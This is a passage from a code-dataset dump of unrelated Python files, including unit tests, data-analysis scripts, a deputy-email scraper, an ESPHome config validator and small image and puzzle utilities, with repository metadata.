\"]\n elif qrepr.endswith(\"gram\"):\n if sys.version_info[0] < 3:\n return get_ngrams(ngram_size, split_sent(\"#\"+sent+\"#\", \"char\"), separator=\"\")\n else:\n return get_ngrams(ngram_size, split_sent(\"#\" + sent.decode(\"utf-8\") + \"#\", \"char\"), separator=\"\")\n else:\n raise Exception(\"Unrecognized representation %s!\" % qrepr)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"560524383","text":"import logging\nfrom common import errfunctions\n\nfrom decimal import Decimal\nimport unittest\nimport datetime\nimport sys\nfrom unittest.mock import MagicMock\n\nfrom PyQt5 import QtWidgets, QtGui, QtCore\n\nfrom database.cacheddataquerier import getCachedDatesDataQuerier\nfrom database.daos import DateF2\nfrom exceptions.exceptions import DataResolveException\nfrom home import Main\nfrom rents.rentlogic import RentLogic\n\n\nclass RentLogicTests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.app = QtWidgets.QApplication(sys.argv)\n cls.home = Main()\n\n def setUp(self):\n self.dataQuerier = MagicMock()\n\n def test_rentPeriodString_headrents_periods_sane_single_period(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllHeadRents(), 1, lambda x: x.hrCode)\n\n def test_rentPeriodString_headrents_periods_sane_2_periods(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllHeadRents(), 2, lambda x: x.hrCode)\n\n def test_rentPeriodString_rents_periods_sane_single_period(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllRents(), 1, lambda x: x.rentCode)\n\n def test_rentPeriodString_rents_periods_sane_2_periods(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllRents(), 2, lambda x: x.rentCode)\n\n def rentPeriodString_headrents_periods_sane(self, rents, periods, rentCodeGetter):\n datesDataQuerier = getCachedDatesDataQuerier(self.home.dbHandler)\n for rent in rents:\n try:\n rentPeriod = RentLogic.rentPeriodString(datesDataQuerier, 
rent.lastRentDate, rent.frequency, rent.dateCode, rent.arrears, rent.advArr, rent.rent, periods)\n startPeriod, endPeriod = [datetime.datetime.strptime(dateString, \"%d/%m/%Y\") for dateString in rentPeriod.split(\" to \")]\n\n daysInPeriod = (endPeriod - startPeriod).days\n daysOnePeriod = 365 / rent.frequency\n if rent.arrears > 0.05:\n arrearsMultiple = rent.arrears / (rent.rent / rent.frequency)\n expectedDaysInPeriod = Decimal(daysOnePeriod) * (periods + arrearsMultiple)\n else:\n expectedDaysInPeriod = daysOnePeriod * periods\n difference = abs(daysInPeriod - expectedDaysInPeriod)\n\n if difference > 14 * periods:# and arrearsMultiple % 1 < 0.1:\n errfunctions.print_err(\"rent code:\" + rentCodeGetter(rent))\n errfunctions.print_err(\"rent period:\" + rentPeriod)\n errfunctions.print_err(\"days in period:\" + str(daysInPeriod))\n errfunctions.print_err(\"expected days in period:\" + str(expectedDaysInPeriod))\n errfunctions.print_err(\"end - start:\" + str((endPeriod - startPeriod)))\n errfunctions.print_err(\"difference:\" + str(difference))\n errfunctions.print_err(\"arrears: {}, rent: {}, multiple: {}\".format(rent.arrears, rent.rent, arrearsMultiple))\n errfunctions.print_err(\"\\n\\n\")\n\n #self.assertTrue(difference < 15)\n\n self.assertTrue(endPeriod > startPeriod)\n\n except Exception as e:\n errfunctions.print_err(\"\\nfailed on: \" + rentCodeGetter(rent) + \"\\n\")\n #raise\n\n def dummyDate(self, date=\"01/01/2000\"):\n return datetime.datetime.strptime(date, \"%d/%m/%Y\").date()\n\n def test_resolveDateCode_resolves_f2_happy_case(self):\n self.dataQuerier.getF2FromDate = MagicMock(return_value=[DateF2([\"F2Jan01A\", self.dummyDate(), self.dummyDate()])])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 2, self.dummyDate())\n self.assertEqual(\"F2Jan01A\", dateCode, \"Datecode incorrect\")\n\n def test_resolveDateCode_raises_f2_ambiguous(self):\n self.dataQuerier.getF2FromDate = MagicMock(return_value=[DateF2([\"F2Jan01A\", self.dummyDate(), self.dummyDate()]),\n DateF2([\"F2Jan01B\", self.dummyDate(), self.dummyDate()])])\n with self.assertRaises(DataResolveException):\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 2, self.dummyDate())\n\n def test_resolveDateCode_makes_appropriate_guess_when_no_results_f2(self):\n self.dataQuerier.getF2FromDate = MagicMock(return_value=[])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 2, self.dummyDate(\"04/07/2010\"))\n self.assertEqual(\"F2Jul04A\", dateCode, \"Datecode incorrect\")\n\n def test_resolveDateCode_resolves_f4_happy_case(self):\n self.dataQuerier.getF4FromDate = MagicMock(return_value=[DateF2([\"F4Jan01A\", self.dummyDate(), self.dummyDate()])])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 4, self.dummyDate())\n self.assertEqual(\"F4Jan01A\", dateCode, \"Datecode incorrect\")\n\n def test_resolveDateCode_raises_f4_ambiguous(self):\n self.dataQuerier.getF4FromDate = MagicMock(return_value=[DateF2([\"F4Jan01A\", self.dummyDate(), self.dummyDate()]),\n DateF2([\"F4Jan01B\", self.dummyDate(), self.dummyDate()])])\n with self.assertRaises(DataResolveException):\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 4, self.dummyDate())\n\n def test_resolveDateCode_makes_appropriate_guess_when_no_results_f4(self):\n self.dataQuerier.getF4FromDate = MagicMock(return_value=[])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 4, self.dummyDate(\"04/07/2010\"))\n self.assertEqual(\"F4Jul04A\", dateCode, \"Datecode 
incorrect\")\n","sub_path":"tests/rentlogictests.py","file_name":"rentlogictests.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"451245311","text":"from pymongo import MongoClient\n\nimport pandas as pd\n\nclient = MongoClient()\ndb = client.galaxy_zoo\n\nsubjects = db.subjects\nclassifications = db.classifications\n\n# cursor = subjects.find({'classification_count': 40})\n# cursor = subjects.find({'metadata.survey': 'decals'})\n\n# cursor = subjects.find({'metadata.dr': 'DR2'})\n#\n# for document in cursor[:10]:\n# print(document)\n\n # metadata = document['metadata']\n # print(metadata)\n # print(metadata['provided_image_id'])\n # print(metadata['dr'])\n # print(document['location']['standard'])\n\n# get previous decals classifications by zooniverse id\n# match classification <- zoo id -> nsa using galaxy zoo with nsa code\n\n# load expert catalog\n\nclassification = classifications.find_one()\nzooniverse_id = classification['subjects'][0]['zooniverse_id']\nprint(zooniverse_id)\n\nclassifications_of_id = classifications.find({'subjects': [zooniverse_id]})\nfor single_classification in classifications_of_id:\n print(single_classification)\n\nsubjects_with_id = subjects.find({'zooniverse_id': zooniverse_id})\nfor single_subject in subjects_with_id:\n print(single_subject)\n\n# cursor = classifications.find({'metadata.dr': 'DR2'})\n# cursor = subjects.find({'metadata.survey': 'candels'})\n\n# for document in cursor[:1]:\n#\n# print(document['annotations'])\n# for subject in document['subjects']:\n# print(subject['zooniverse_id'])\n# print(subject['metadata'])\n\n# subjects = subjects.find({'metadata.dr': 'DR2'})\n# for subject in subjects[:1]:\n# classifications_of_subject = classifications.find()","sub_path":"decals/z_analysis/confusion_matrix/investigate_gz_dump.py","file_name":"investigate_gz_dump.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"19993971","text":"# coding=utf-8\n\ntry:\n from airtest.core.api import device as current_device\n from airtest.core.api import touch, swipe\n from airtest.core.helper import device_platform\nexcept ImportError:\n # 兼容旧版本\n from airtest.cli.runner import device as current_device\n from airtest.core.main import touch, swipe\n from airtest.core.main import get_platform as device_platform\nfrom poco.sdk.interfaces.input import InputInterface\n\n\nclass AirtestInput(InputInterface):\n def __init__(self):\n super(AirtestInput, self).__init__()\n self.default_touch_down_duration = 0.01\n\n def _get_touch_resolution(self):\n \"\"\"\n get real time resolution on device if full screen\n or window size if running in window mode\n \"\"\"\n return current_device().get_current_resolution()\n\n def setTouchDownDuration(self, duration):\n self.default_touch_down_duration = duration\n\n def getTouchDownDuration(self):\n return self.default_touch_down_duration\n\n def click(self, x, y):\n pw, ph = self._get_touch_resolution()\n pos = [x * pw, y * ph]\n touch(pos, duration=self.default_touch_down_duration)\n\n def swipe(self, x1, y1, x2, y2, duration=2.0):\n if duration <= 0:\n raise ValueError(\"Operation duration cannot be less equal 0. 
Please provide a positive number.\")\r\n direction = x2 - x1, y2 - y1\r\n pw, ph = self._get_touch_resolution()\r\n p1 = [x1 * pw, y1 * ph]\r\n steps = int(duration * 40) + 1\r\n swipe(p1, vector=direction, duration=duration, steps=steps)\r\n\r\n def longClick(self, x, y, duration=2.0):\r\n if duration <= 0:\r\n raise ValueError(\"Operation duration cannot be less equal 0. Please provide a positive number.\")\r\n pw, ph = self._get_touch_resolution()\r\n pos = [x * pw, y * ph]\r\n touch(pos, duration=duration)\r\n","sub_path":"poco/utils/airtest/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"360269843","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('Salary_Data.csv');\r\n\r\nx = data['YearsExperience'].values\r\ny = data['Salary'].values\r\n\r\ndef pred(x,y):\r\n m = ((np.mean(x))*(np.mean(y))-np.mean(x*y))/(((np.mean(x))**2)-np.mean(x**2))\r\n b = np.mean(y) - m*np.mean(x)\r\n print(m,b)\r\n y_new=[]\r\n for i in x:\r\n y_new.append(b + m*i)\r\n return y_new; \r\n \r\n\r\ndef Standard_error_line(y,y_new):\r\n sdl = sum((y-y_new)**2)\r\n return sdl;\r\n \r\ndef Standard_error_mean(y):\r\n y_mean=[]\r\n for i in y:\r\n y_mean.append(np.mean(y))\r\n sdm = sum((y-y_mean)**2)\r\n return sdm;\r\n \r\n\r\ndef cofficient(x,y):\r\n y_new = pred(x,y)\r\n sdl = Standard_error_line(y,y_new)\r\n sdm = Standard_error_mean(y)\r\n r = 1 - (sdl/sdm)\r\n return r;\r\n \r\nr = cofficient(x,y)\r\nprint(r)\r\n\r\n# y_new was only defined inside pred(); recompute it here so the plot call below works\r\ny_new = pred(x,y)\r\n\r\nplt.scatter(x,y,color=\"green\")\r\nplt.plot(x,y_new,color=\"orange\")\r\nplt.show()","sub_path":"ML2.py","file_name":"ML2.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"608183548","text":"# -*- coding: utf-8 -*-\nfrom codecs import open\nfrom unidecode import unidecode\nfrom bs4 import BeautifulSoup\nfrom urllib2 import urlopen\nimport json,csv\nimport re,htmlentitydefs\n\n# Function to decode the ASCII character entities that hide the email address from a simple bot\n# A glue snippet from Seb! I really like his Python genius\n\n\ndef htmlentitydecode(s):\n # First convert alpha entities (such as &eacute;)\n # (Inspired from http://mail.python.org/pipermail/python-list/2007-June/443813.html)\n def entity2char(m):\n entity = m.group(1)\n if entity in htmlentitydefs.name2codepoint:\n return unichr(htmlentitydefs.name2codepoint[entity])\n return u\" \" # Unknown entity: We replace with a space.\n t = re.sub(u'&(%s);' % u'|'.join(htmlentitydefs.name2codepoint), entity2char, s)\n \n # Then convert numerical entities (such as &#233;)\n t = re.sub(u'&#(\\d+);', lambda x: unichr(int(x.group(1))), t)\n \n # Then convert hexa entities (such as &#xE9;)\n return re.sub(u'&#x(\\w+);', lambda x: unichr(int(x.group(1),16)), t)\n\n\ndef vas_chercher():\n\n\t#List of the few URLs of the pages that contain the list of deputies\n\t#Another possible optimization, like Alioune's, on the page count with an incrementable counter \n\turls = {\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=1\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=2\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=3\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=4\"\n\t}\n\n\tdeputes = []\n\n\tfor url in urls:\n\t\tpage = urlopen(url)\n\t\tlaSoupe = BeautifulSoup(page.read())\n\n\t\t# capture the table located just after the div.pagenavcounter\n\t\ttableDepute = laSoupe.find('div', { 'class':'pagenavcounter'}).findNextSibling().tbody.find_all('tr')\n\t\t\n\t\t# Pop from the top of the stack the junk that belonged in the table's thead\n\t\ttableDepute.pop(0)\n\n\t\t\n\t\tfor tr in tableDepute:\n\t\t\ttds = tr.find_all('td')\n\n\t\t\tdepute = []\n\n\t\t\tfor td in tds:\n\n\t\t\t\t# convert the data to unicode so the deputies' email addresses can be rebuilt\n\t\t\t\t# the code could be refactored to only work on the index where the text is located\n\t\t\t\tsanitizedString = htmlentitydecode(td.get_text())\n\t\t\t\t\n\t\t\t\t# the regex soup that captures this semblance of security\n\t\t\t\tmail = re.search(r\"var addy([0-9]*) \\= '([a-z0-9\\.\\_\\-]*)'\",sanitizedString,re.M|re.I); \n\n\t\t\t\tif mail:\n\t\t\t\t\tdepute.append(mail.group(2)+'@assemblee-nationale.sn')\n\t\t\t\telse:\n\t\t\t\t\tdepute.append(td.get_text().encode('utf-8'))\n\t\t\t\t#print depute\n\t\t\tdeputes.append(depute)\n\t\t\tdeputes = sorted(deputes, key= lambda dep: int(dep[0]))\n\t# Saving to json\n\tjson_file = open('data/data.json','w')\n\tjson.dump(deputes,json_file)\n\tjson_file.close();\n\n\t#saving to csv\n\tentete = ['id','Prénom','Nom','Email']\n\tdeputes.insert(0,entete)\n\n\tcsv_file = open('data/data.csv','w')\n\twriter = csv.writer(csv_file,delimiter=b',')\n\tfor line in deputes:\n\t\twriter.writerow(line)\n\n\n\nvas_chercher()","sub_path":"scripts/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"119616374","text":"\r\n\r\ndef do_print(case, positions):\r\n out.write(\"Case #{0}:\".format(case))\r\n for i in positions:\r\n out.write(\" {0}\".format(i))\r\n out.write(\"\\n\")\r\n\r\ndef 
calc_position(K, C, positions):\r\n if len(positions) != C:\r\n print(\"WARNING\")\r\n for _ in range(C-len(positions)):\r\n positions.append(0)\r\n\r\n x = list(reversed(range(C)))\r\n ret = 1\r\n for i in range(C):\r\n ret = ret + (K**x[i])*positions[i]\r\n # print(\"RET: {}\".format(ret))\r\n return ret\r\n\r\n\r\nf = open(\"D-large.in\")\r\nout = open(\"out.txt\", \"w\")\r\nT = int(f.readline())\r\nprint(T)\r\n\r\nfor i in range(T):\r\n K,C,S = map(int, f.readline().split())\r\n print(\"kcs {0},{1},{2}\".format(K,C,S))\r\n # if S >= K:\r\n # do_print(i+1, [p+1 for p in range(S)])\r\n # continue\r\n if C*S >= K:\r\n pos_list = []\r\n pos = []\r\n for p in range(K):\r\n pos.append(p)\r\n if len(pos) == C:\r\n pos_list.append(calc_position(K, C, pos))\r\n pos = []\r\n # print(\"POS: {}\".format(pos))\r\n if len(pos) != 0:\r\n pos_list.append(calc_position(K, C, pos))\r\n do_print(i+1, pos_list)\r\n continue\r\n out.write(\"Case #{0}: {1}\\n\".format(i+1, \"IMPOSSIBLE\"))\r\n","sub_path":"codes/CodeJamCrawler/16_0_4_neat/16_0_4_EarthShadows_fractal.py","file_name":"16_0_4_EarthShadows_fractal.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"171299565","text":"\n\n#calss header\nclass _QUOTE():\n\tdef __init__(self,): \n\t\tself.name = \"QUOTE\"\n\t\tself.definitions = [u'to repeat the words that someone else has said or written: ', u'If you quote a fact or example, you refer to it in order to add emphasis to what you are saying: ', u'to give a price, especially one that will be charged for doing a piece of work: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_quote.py","file_name":"_quote.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"542120681","text":"import utils.API_Responses as Responses\nimport utils.Dynamo as Dynamo\nimport utils.EC2 as EC2 \nfrom botocore.exceptions import ClientError\nfrom datetime import datetime\n\ndef handler(event, context):\n item = {\n \"PK\": \"CONSTRAINT\",\n \"SK\": datetime.now().isoformat(),\n \"modifiedAt\": datetime.now().isoformat()\n }\n for key, value in event['queryStringParameters'].items():\n if key != 'force':\n item[key] = value\n try:\n Dynamo.put(Item=item)\n EC2.start_instance(event['queryStringParameters'])\n return Responses._201()\n except ClientError as e:\n return Responses._CustomResponse(e.response['Error']['Message'], e.response['ResponseMetadata']['HTTPStatusCode'])\n","sub_path":"endpoints/createConstraint.py","file_name":"createConstraint.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"494831477","text":"class MemoryReallocation(object):\n def __init__(self):\n pass\n\n def reallocate(self, banks):\n current_banks = tuple([int(i) for i in banks.split()])\n\n # Save the initial state of the world\n seen_banks = {current_banks}\n seen_banks_at_cycle = {}\n count = 1\n while True:\n current_banks = self.spread(current_banks)\n if current_banks in seen_banks:\n return count, count - seen_banks_at_cycle[current_banks] + 1\n count += 1\n seen_banks.add(current_banks)\n seen_banks_at_cycle[current_banks] = count\n\n def spread(self, banks):\n 
\"\"\"\n Distribute the largest bank across the other memory banks evenly\n :param banks:\n :return: A rebalanced banks\n \"\"\"\n # Find the max bank\n banks_list = list(banks)\n max_bank_value = max(banks_list)\n max_bank_index = banks_list.index(max_bank_value)\n\n # Clear out the memory block\n banks_list[max_bank_index] = 0\n for i in range(max_bank_index + 1, max_bank_index + 1 + max_bank_value):\n banks_list[i % len(banks_list)] += 1\n return tuple(banks_list)\n\n\n\"\"\"\n\nOut of curiosity, the debugger would also like to know the size of the loop: starting from a state that has already been seen, how many block redistribution cycles must be performed before that same state is seen again?\n\nIn the example above, 2 4 1 2 is seen again after four cycles, and so the answer in that example would be 4.\n\nHow many cycles are in the infinite loop that arises from the configuration in your puzzle input?\n\"\"\"\n","sub_path":"advent/memory_reallocation.py","file_name":"memory_reallocation.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"214576550","text":"from __future__ import print_function\n\nimport importlib\nimport logging\nfrom collections import OrderedDict\n\nimport voluptuous as vol\nfrom voluptuous.humanize import humanize_error\n\nfrom esphomeyaml import core, yaml_util, core_config\nfrom esphomeyaml.const import CONF_ESPHOMEYAML, CONF_PLATFORM, CONF_WIFI, ESP_PLATFORMS\nfrom esphomeyaml.core import ESPHomeYAMLError\nfrom esphomeyaml.helpers import color\n\n_LOGGER = logging.getLogger(__name__)\n\nREQUIRED_COMPONENTS = [\n CONF_ESPHOMEYAML, CONF_WIFI\n]\n_COMPONENT_CACHE = {}\n_ALL_COMPONENTS = []\n\n\ndef get_component(domain):\n if domain in _COMPONENT_CACHE:\n return _COMPONENT_CACHE[domain]\n\n path = 'esphomeyaml.components.{}'.format(domain)\n try:\n module = importlib.import_module(path)\n except ImportError as err:\n _LOGGER.debug(err)\n else:\n _COMPONENT_CACHE[domain] = module\n return module\n\n _LOGGER.error(\"Unable to find component %s\", domain)\n return None\n\n\ndef get_platform(domain, platform):\n return get_component(\"{}.{}\".format(domain, platform))\n\n\ndef is_platform_component(component):\n return hasattr(component, 'PLATFORM_SCHEMA')\n\n\ndef iter_components(config):\n for domain, conf in config.iteritems():\n if domain == CONF_ESPHOMEYAML:\n continue\n component = get_component(domain)\n yield domain, component, conf\n if is_platform_component(component):\n for p_config in conf:\n p_name = u\"{}.{}\".format(domain, p_config[CONF_PLATFORM])\n platform = get_component(p_name)\n yield p_name, platform, p_config\n\n\nclass Config(OrderedDict):\n def __init__(self):\n super(Config, self).__init__()\n self.errors = []\n\n def add_error(self, message, domain=None, config=None):\n if not isinstance(message, unicode):\n message = unicode(message)\n self.errors.append((message, domain, config))\n\n\ndef iter_ids(config, prefix=None, parent=None):\n prefix = prefix or []\n parent = parent or {}\n if isinstance(config, core.ID):\n yield config, prefix, parent\n elif isinstance(config, core.Lambda):\n for id in config.requires_ids:\n yield id, prefix, parent\n elif isinstance(config, list):\n for i, item in enumerate(config):\n for result in iter_ids(item, prefix + [str(i)], config):\n yield result\n elif isinstance(config, dict):\n for key, value in config.iteritems():\n for result in iter_ids(value, prefix + [str(key)], config):\n yield result\n\n\ndef 
do_id_pass(result):\n declare_ids = []\n searching_ids = []\n for id, prefix, config in iter_ids(result):\n if id.is_declaration:\n if id.id is not None and any(v[0].id == id.id for v in declare_ids):\n result.add_error(\"ID {} redefined!\".format(id.id), '.'.join(prefix), config)\n continue\n declare_ids.append((id, prefix, config))\n else:\n searching_ids.append((id, prefix, config))\n # Resolve default ids after manual IDs\n for id, _, _ in declare_ids:\n id.resolve([v[0].id for v in declare_ids])\n\n # Check searched IDs\n for id, prefix, config in searching_ids:\n if id.id is not None and not any(v[0].id == id.id for v in declare_ids):\n result.add_error(\"Couldn't find ID {}\".format(id.id), '.'.join(prefix), config)\n if id.id is None and id.type is not None:\n id.id = next((v[0].id for v in declare_ids if v[0].type == id.type), None)\n if id.id is None:\n result.add_error(\"Couldn't resolve ID for type {}\".format(id.type),\n '.'.join(prefix), config)\n\n\ndef validate_config(config):\n global _ALL_COMPONENTS\n\n for req in REQUIRED_COMPONENTS:\n if req not in config:\n raise ESPHomeYAMLError(\"Component {} is required for esphomeyaml.\".format(req))\n\n _ALL_COMPONENTS = list(config.keys())\n\n result = Config()\n\n def _comp_error(ex, domain, config):\n result.add_error(_format_config_error(ex, domain, config), domain, config)\n\n try:\n result[CONF_ESPHOMEYAML] = core_config.CONFIG_SCHEMA(config[CONF_ESPHOMEYAML])\n except vol.Invalid as ex:\n _comp_error(ex, CONF_ESPHOMEYAML, config[CONF_ESPHOMEYAML])\n\n for domain, conf in config.iteritems():\n domain = str(domain)\n if domain == CONF_ESPHOMEYAML or domain.startswith('.'):\n continue\n if conf is None:\n conf = {}\n component = get_component(domain)\n if component is None:\n result.add_error(u\"Component not found: {}\".format(domain), domain, conf)\n continue\n\n esp_platforms = getattr(component, 'ESP_PLATFORMS', ESP_PLATFORMS)\n if core.ESP_PLATFORM not in esp_platforms:\n result.add_error(u\"Component {} doesn't support {}.\".format(domain, core.ESP_PLATFORM),\n domain, conf)\n continue\n\n success = True\n dependencies = getattr(component, 'DEPENDENCIES', [])\n for dependency in dependencies:\n if dependency not in _ALL_COMPONENTS:\n result.add_error(u\"Component {} requires component {}\".format(domain, dependency),\n domain, conf)\n success = False\n if not success:\n continue\n\n if hasattr(component, 'CONFIG_SCHEMA'):\n try:\n validated = component.CONFIG_SCHEMA(conf)\n result[domain] = validated\n except vol.Invalid as ex:\n _comp_error(ex, domain, conf)\n continue\n\n if not hasattr(component, 'PLATFORM_SCHEMA'):\n continue\n\n platforms = []\n for p_config in conf:\n if not isinstance(p_config, dict):\n result.add_error(u\"Platform schemas must have 'platform:' key\", )\n continue\n p_name = p_config.get(u'platform')\n if p_name is None:\n result.add_error(u\"No platform specified for {}\".format(domain))\n continue\n p_domain = u'{}.{}'.format(domain, p_name)\n platform = get_platform(domain, p_name)\n if platform is None:\n result.add_error(u\"Platform not found: {}\".format(p_domain), p_domain, p_config)\n continue\n\n success = True\n dependencies = getattr(platform, 'DEPENDENCIES', [])\n for dependency in dependencies:\n if dependency not in _ALL_COMPONENTS:\n result.add_error(\n u\"Platform {} requires component {}\".format(p_domain, dependency),\n p_domain, p_config)\n success = False\n if not success:\n continue\n\n esp_platforms = getattr(platform, 'ESP_PLATFORMS', ESP_PLATFORMS)\n if core.ESP_PLATFORM 
not in esp_platforms:\n result.add_error(\n u\"Platform {} doesn't support {}.\".format(p_domain, core.ESP_PLATFORM),\n p_domain, p_config)\n continue\n\n if hasattr(platform, u'PLATFORM_SCHEMA'):\n try:\n p_validated = platform.PLATFORM_SCHEMA(p_config)\n except vol.Invalid as ex:\n _comp_error(ex, p_domain, p_config)\n continue\n platforms.append(p_validated)\n result[domain] = platforms\n\n do_id_pass(result)\n return result\n\n\nREQUIRED = ['esphomeyaml', 'wifi']\n\n\ndef _format_config_error(ex, domain, config):\n message = u\"Invalid config for [{}]: \".format(domain)\n if u'extra keys not allowed' in ex.error_message:\n message += u'[{}] is an invalid option for [{}]. Check: {}->{}.' \\\n .format(ex.path[-1], domain, domain,\n u'->'.join(str(m) for m in ex.path))\n else:\n message += u'{}.'.format(humanize_error(config, ex))\n\n if isinstance(config, list):\n return message\n\n domain_config = config.get(domain, config)\n message += u\" (See {}, line {}). \".format(\n getattr(domain_config, '__config_file__', '?'),\n getattr(domain_config, '__line__', '?'))\n\n return message\n\n\ndef load_config(path):\n try:\n config = yaml_util.load_yaml(path)\n except OSError:\n raise ESPHomeYAMLError(u\"Could not read configuration file at {}\".format(path))\n core.RAW_CONFIG = config\n core_config.preload_core_config(config)\n\n try:\n result = validate_config(config)\n except ESPHomeYAMLError:\n raise\n except Exception:\n _LOGGER.error(u\"Unexpected exception while reading configuration:\")\n raise\n\n return result\n\n\ndef line_info(obj, **kwargs):\n \"\"\"Display line config source.\"\"\"\n if hasattr(obj, '__config_file__'):\n return color('cyan', \"[source {}:{}]\"\n .format(obj.__config_file__, obj.__line__ or '?'),\n **kwargs)\n return '?'\n\n\ndef dump_dict(layer, indent_count=3, listi=False, **kwargs):\n def sort_dict_key(val):\n \"\"\"Return the dict key for sorting.\"\"\"\n key = str.lower(val[0])\n return '0' if key == 'platform' else key\n\n indent_str = indent_count * ' '\n if listi or isinstance(layer, list):\n indent_str = indent_str[:-1] + '-'\n if isinstance(layer, dict):\n for key, value in sorted(layer.items(), key=sort_dict_key):\n if isinstance(value, (dict, list)):\n print(indent_str, key + ':', line_info(value, **kwargs))\n dump_dict(value, indent_count + 2)\n else:\n print(indent_str, key + ':', value)\n indent_str = indent_count * ' '\n if isinstance(layer, (list, tuple)):\n for i in layer:\n if isinstance(i, dict):\n dump_dict(i, indent_count + 2, True)\n else:\n print(' ', indent_str, i)\n\n\ndef read_config(path):\n _LOGGER.info(\"Reading configuration...\")\n try:\n res = load_config(path)\n except ESPHomeYAMLError as err:\n _LOGGER.error(u\"Error while reading config: %s\", err)\n return None\n excepts = {}\n for message, domain, config in res.errors:\n domain = domain or u\"General Error\"\n excepts.setdefault(domain, []).append(message)\n if config is not None:\n excepts[domain].append(config)\n\n if excepts:\n print(color('bold_white', u\"Failed config\"))\n for domain, config in excepts.iteritems():\n print(' ', color('bold_red', domain + ':'), color('red', '', reset='red'))\n dump_dict(config, reset='red')\n print(color('reset'))\n return None\n return OrderedDict(res)\n","sub_path":"esphomeyaml/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"396603634","text":"import time,os\nfrom PIL import ImageGrab,Image\nfrom 
utils.config import SCREEN_PATH\n\n\ndef Screeshot():\n tm = time.strftime(\"%Y%m%d-%H%M%S\", time.localtime())\n print(tm)\n im = ImageGrab.grab()\n im.show() \n im.save(SCREEN_PATH + r'\\\\%s.png' % tm)\n\nwhile True:\n print('截图')\n Screeshot()\n print('暂停')\n time.sleep(10)","sub_path":"venv/test_2/jieping.py","file_name":"jieping.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73286726","text":"import cv2\n\n## load an image from\nimg = cv2.imread(\"assets/RE.jpeg\",0)##put mode of image(-1 for transperency, 0 for grey scale mode, 1 fpr including alpha )\n## in bgr you get colorfull image\n\n\n#### resize and rotate this image\n#img= cv2.resize(img,(1300,1600))\nimg= cv2.resize(img,(0,0), fx=2, fy= 2)\n\n\n\n###\n##rotate this image\n# img = cv2.rotate(img, cv2.cv2.ROTATE_90_CLOCKWISE)\n## \ncv2.imwrite(\"new.jpeg\", img)\n \n \n \n# put mode of image(-1 for transperency, 0 for grey scale mode, 1 fpr including alpha )\n## in bgr you get colorfull image\n\ncv2.imshow(\"Roy\",img)\ncv2.waitKey(0) # wait for 5 seccond\n\ncv2.destroyAllWindows()","sub_path":"introduction_images.py","file_name":"introduction_images.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"278968085","text":"from sys import stdin\ndef veri(matriz):\n filas = []\n column= []\n for i in range(len(matriz)):\n sumcol= 0\n for j in range(len(matriz)):\n sumcol += matriz[j][i]\n if sum(matriz[i])%2 == 1:\n filas.append(i+1)\n if sumcol%2 ==1:\n column.append(i+1)\n if len(filas)==0 and len(column)==0:\n return 1\n elif len(filas)>=2 or len(column)>=2:\n return 2\n else:\n return filas[0],column[0]\ndef shift(matriz, tam):\n return 2,3\ndef main():\n tam = int(stdin.readline())\n while tam != 0:\n y = []\n for j in range(tam):\n y.append([int(x) for x in stdin.readline().split()])\n if veri(y) == 2:\n 